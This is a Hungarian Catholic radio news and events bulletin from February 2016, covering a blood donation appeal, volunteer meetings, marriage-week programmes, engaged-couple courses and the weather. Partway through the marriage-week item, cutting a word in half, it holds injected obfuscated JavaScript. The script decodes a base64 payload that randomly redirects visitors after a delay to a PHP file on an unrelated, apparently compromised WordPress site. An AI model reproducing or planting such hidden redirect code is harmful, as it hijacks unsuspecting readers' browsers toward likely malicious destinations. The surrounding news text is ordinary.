2016. február 5. – Hírek és programajánló

H Í R E K   R E G G E L / D É L B E N

Sűrgős segítségre van szükség!
Egy egyházi alkalmazott súlyos állapotba került be a kórházba és műtétre szorul. Ahoz viszont, hogy műteni tudják, vérre lenne szüksége. Hívjuk hallgatóinkat, aki tud, segítsen, vért adva a csíkszeredai vérközpontban, a mai nap folyamán. Fontos tudni, hogy 18-60 év közötti egészséges emberek adhatnak vért. A szükséges vércsoport B vagy 3-as, RH pozitív. Isten fizesse mindenki jószándékát!

Mária rádiós önkéntestalálkozók
Folynak az idei első önkéntestalálkozók. Nagyvárad és Kolozsvár után ma délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián várjuk önkénteseinket, itt jelen lesz majd rádiónk műsorigazgatója is, Karácson Tibor atya. Február 6-án, elsőszombaton, délután három órától Csíksomlyón, a kolostor épületébe várják önkénteseinket Szilágyi László promóciós munkatársunk, valamint Karácson Tibor műsorigazgató, majd Kászonújfaluban, a délután öt órás szentmise végén közönségtalálkozóra kerül sor. Vasárnap, február 7-én, Nyújtódon két közönségtalálkozó is lesz, a reggel kilenc, illetve a tizenegy órás szentmisék után. Ez utóbbi szentmisén, melyet rádiónk is közvetít, koncelebrál Karácson Tibor atya. Szintén vasárnap, délután három órától Sepsiszentgyörgyön, a Krisztus Király plébánia hittantermében várják önkénteseinket Szilágyi László és Tibor atya. A további helyszínekről hírműsorainkban folyamatos tájékoztatást adunk.

Elsőpénteki keresztút a Székely Kálvárián
Ma délután öt órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják a székelyudvarhelyieket és környékbelieket, akik családjainkért felajánlanak egy keresztútjárásnyi időt és imát. Időjárástól függetlenül minden alkalommal megtartják a szabadtéri ájtatosságot – ajánlatos ennek megfelelő lábbelit és öltözéket viselni.

KELET 2016
Február 5-7. között Szegeden rendezik meg a Kárpát-medencei Egyetemi Lelkészségek Találkozóját. A rendezvényen jelen lesz Böjte Csaba ferences szerzetes is. A résztvevők interaktív programokon, előadásokon, szentmiséken, illetve városnéző túrákon vehetnek részt. A találkozó zárásaként, vasárnap Palánki Ferenc püspök celebrál szentmisét a Fogadalmi Templomban. A KELETről részletekkel a mai Déli magazin műsorunkban jelentkezünk.

Ifjúság vasárnapja a Gyulafehérvári Főegyházmegyében
Tizenhat éve, hogy a gyulafehérvári egyházmegyében a farsang utolsó vasárnapját az ifjúság vasárnapjának tartják. Minden korban kihívást jelentett az ifjúsági lelkipásztorkodás, ezért a sokrétű munkát az Ifjúsági Főlelkészség koordinálja, aki idén is változatos programokkal készül a fiatalok számára. Ezen pasztorációs tevékenységek támogatására lesz gyűjtés február 7-én, vasárnap, a Gyulafehérvári Főegyházmegye templomaiban. Várják a hívek jószándékú hozzájárulását!

Házasság hete egyházmegyéinkben
Február 7-14. között ötödik alkalommal kerül megrendezésre magyar nyelvterületen is a Házasság hete, a következő mottóval: A szeretet: szenvedély és döntés.
A gyulafehérvári egyházmegyében több település kapcsolódik be a rendezvénysorozatba: Székelyudvarhelyen, idén is sokféle programra hívják a házasokat: kettesben eltöltött vacsora, filmnézés, szentségimádás, keresztút, tanúságtételek. A különböző rendezvényekre előzetes bejelentkezés szükséges. Csíkszentdomonkoson lesz: házaspárok bálja, filmest, keresztút a családokért, előadások, szentmise. Marosvásárhelyen és Marosszentgyörgyön is sokszínű a választék a családok számára: előadások, párbeszédek, meghitt vacsorák, ima és böjtnap, szentmise. Gyergyószentmiklóson lesz: kerekasztal beszélgetés, filmnézés, virrasztás. Kolozsváron a ferences családos csoport egy olyan egymásra figyelős játékra hívja a házaspárokat, korosztálytól függetlenül, amelynek célja, hogy a házaspárok közelebb kerüljenek egymáshoz. A játék 7 próbát tartalmaz, melynek menetlevele letölthető a www.ofm.ro honlapon, a Házasság hete címszó alatt. Mindazok között, akik a próbákat teljesítik, értékes ajándékok találnak gazdára. A jelentkezéssel kapcsolatos információkért, illetve a játék bővebb leírásáért látogassák meg a kolozsvári ferencesek honlapját.
A szatmári egyházmegyében is érdekes programokkal várják a házasokat, családokat: házas kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúra, filmvetítés, előadások, keresztút. Részletes információkat, illetve elérhetőségeket a különböző programokra való jelentkezéshez a szatmariegyhazmegye.ro oldalon találhatnak.

Valóra vált játékban élni
Február 13-án, szombaton este hét órától a ferencesek által rendezett házas-játék zárásaként, szeretettel várnak minden kedves érdeklődőt a ferences kolostor dísztermébe, Homa Ildikó, pszichológus előadására, melynek címe: „Akarsz-e élni, élni mindörökkön, játékban élni, mely valóra vált?”

Jegyeskurzusok indulnak
A Családpasztorációs Iroda szervezésében február 9-én, kedden újabb jegyeskurzus indul Marosvásárhelyen – tudtuk meg az érsekség honlapjáról. A jegyeskurzus egyházi és szakmai segítség fiataloknak, akik házasságra készülnek, lehetőség a párkapcsolat elmélyítésére, egyben ismerkedési lehetőség más párokkal, közösségben való felkészülés a szentségi házasságra és a keresztény családi életre.
A kurzus nyolc hétig tart és április 5-én ér véget. A találkozók kedd esténként lesznek 19.00-21.00 óra között. Elsősorban azok jelentkezését várják, akik idén akarnak összeházasodni, de jelentkezhetnek olyan párok is, akik szeretnék jobban megismerni önmagukat és kapcsolatukat.
A kurzus házigazdái: Sófalvi Szabolcs és Adél. Jelentkezni a honlapunkon található elérhetőségeken lehet. (Szénégető Istvánnál: szenegetoi@gmail.com, 0740-138784 vagy a Sófalvi házaspárnál: adelasofalvi@yahoo.com , 0744-799055).
Ugyancsak kedden, február 9-én kezdődik jegyeskurzus a Székelyudvarhely-Szombatfalva Szent György és a Kis Szent Teréz egyházközségek közös szervezésében. Jelentkezni személyesen lehet a plébániahivatalokban.
Sepsiszentgyörgyön február 10-én, szerdán este hét órától kezdődik a jegyeskurzus a Szent József plébánián. Jelentkezni a plébánia irodájában lehet.

Férjek – édesapák hétvégéje
A Gyulafehérvári Főegyházmegye Pasztorális Bizottságának család-munkacsoportja szervezésében idén is sor kerül a Férjek-Édesapák Hétvégéjére, melynek fókuszában az apa-fia kapcsolat áll. A program február 19-21 között zajlik Csíksomlyón, a Jakab Antal Felnőttképzési és Tanulmányi Központban. Jelentkezni a www.csalad.ro oldalon lehetséges.

Az időjárásról: Hajnalban többfelé lehet eső, zápor, nyugaton és a középső területeken hózápor, havazás is. Egyre nagyobb területen megerősödik, néhol viharossá fokozódik a szél. Hajnalban -9, -2, délután 1-6 fok várható.

MRE - Hírszolgálat, 2016. február 5.

 

 

 

About the author

maradmin

Leave a Comment